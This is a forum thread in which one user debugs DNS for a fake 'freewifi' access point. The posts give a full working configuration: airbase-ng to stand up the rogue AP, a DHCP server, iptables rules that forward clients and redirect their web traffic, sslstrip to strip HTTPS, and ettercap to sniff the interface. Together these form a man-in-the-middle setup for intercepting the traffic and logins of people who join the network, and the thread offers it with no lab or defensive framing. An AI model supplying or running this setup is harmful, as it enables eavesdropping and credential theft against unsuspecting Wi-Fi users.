fake access point clients can not access internet



--JayJay--
2016-03-25, 08:43
With my setup pictured in the attachment there's an issue with the fake wireless access point clients using DNS.
DNS is routed to the gateway address 192.168.1.1 according to this rule which routes UDP traffic to 192.168.1.1:

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1

Is this 192.168.1.1 supposed to be a DNS server/proxy of some sort?
DNS traffic from the wireless clients in this setup seems to finish at this point.
In my setup 192.168.1.1 is the default gateway/forwarder but not a DNS proxy or router.



Here's the configuration:

############# DHCP INSTALL ##############
apt-get install isc-dhcp-server

####### EDIT /etc/dhcpd.conf #####################
authoritative;
default-lease-time 600;
max-lease-time 7200;
subnet 192.168.2.0 netmask 255.255.255.0 {
option routers 192.168.2.1;
option subnet-mask 255.255.255.0;
option domain-name "freewifi";
option domain-name-servers 192.168.1.1;
range 192.168.2.111 192.168.2.119;
}

############# AIRMON-NG ############
airmon-ng
airmon-ng start wlan0
airbase-ng -c 11 -e freewifi wlan0mon

############# AT0 AND IPTABLES #############
ifconfig at0 192.168.2.1 netmask 255.255.255.0
ifconfig at0 mtu 1500
route add -net 192.168.2.0 netmask 255.255.255.0 gw 192.168.2.1
echo 1 > /proc/sys/net/ipv4/ip_forward
iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1
iptables -P FORWARD ACCEPT
iptables --append FORWARD --in-interface at0 -j ACCEPT
iptables --table nat --append POSTROUTING --out-interface eth0 -j MASQUERADE
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
dhcpd -cf /etc/dhcpd.conf -pf /var/run/dhcpd.pid at0
/etc/init.d/isc-dhcp-server start
################# SSLSTRIP ####################
sslstrip -f -k -p 10000

################# ETTERCAP ##############
ettercap -p -u -T -q -i at0



--JayJay--
2016-03-25, 14:02
When changing ...

option domain-name-servers 192.168.1.1;
to
option domain-name-servers 8.8.8.8;

in the DHCP setup the result is the same, as the next line in iptables is pointing all UDP traffic to 192.168.1.1:

iptables -t nat -A PREROUTING -p udp -j DNAT --to 192.168.1.1